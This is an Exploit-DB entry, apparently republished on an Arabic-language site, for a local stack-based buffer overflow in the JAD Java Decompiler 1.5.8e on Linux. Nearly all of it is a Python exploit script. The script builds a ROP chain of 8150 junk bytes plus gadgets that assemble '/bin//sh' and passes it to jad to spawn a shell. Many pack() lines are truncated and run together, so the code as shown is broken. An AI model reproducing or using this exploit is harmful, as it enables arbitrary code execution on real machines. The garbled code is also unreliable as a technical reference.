JAD Java Decompiler 1.5.8e - Buffer Overflow
34216133623428476
أخبار ساخنة

JAD Java Decompiler 1.5.8e - Buffer Overflow

الخط
EDB-ID: 42255
Author: Juan Sacco
Published: 2017-06-26
CVE: N/A
Type: Local
Platform: Linux
Vulnerable App: Download Vulnerable Application

 # Exploit Author: Juan Sacco  at KPN Red Team - http://www.kpn.com 
# Developed using Exploit Pack - http://exploitpack.com -
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: JAD ( Java Decompiler ) 1.5.8e-1kali1 and prior is prone to a stack-based buffer overflow
# vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://www.varaneckas.com/jad/
#
# CANARY : disabled
# FORTIFY : disabled
# NX : ENABLED
# PIE : disabled
# RELRO : disabled
#
import os, subprocess
from struct import pack

ropchain = "A"*8150 # junk
ropchain += pack(' edi ; pop ebp ; ret
ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += '/bin'
ropchain += pack(' ebx ; pop ebp ; ret
ropchain += pack(' ropchain += pack(' ropchain += pack(' edi ; pop ebp ; ret
ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += '//sh'
ropchain += pack(' ebx ; pop ebp ; ret
ropchain += pack(' ropchain += pack(' ropchain += pack(' edi ; pop ebp ; ret
ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ebx ; pop ebp ; ret
ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' edi ; pop ebp ; ret
ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack(' ropchain += pack('
try:
print("[*] JAD 1.5.8 Stack-Based Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
subprocess.call(["jad", ropchain])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "JAD not found!"
else:
print "Error executing exploit"
raise

نموذج الاتصال
الاسمبريد إلكترونيرسالة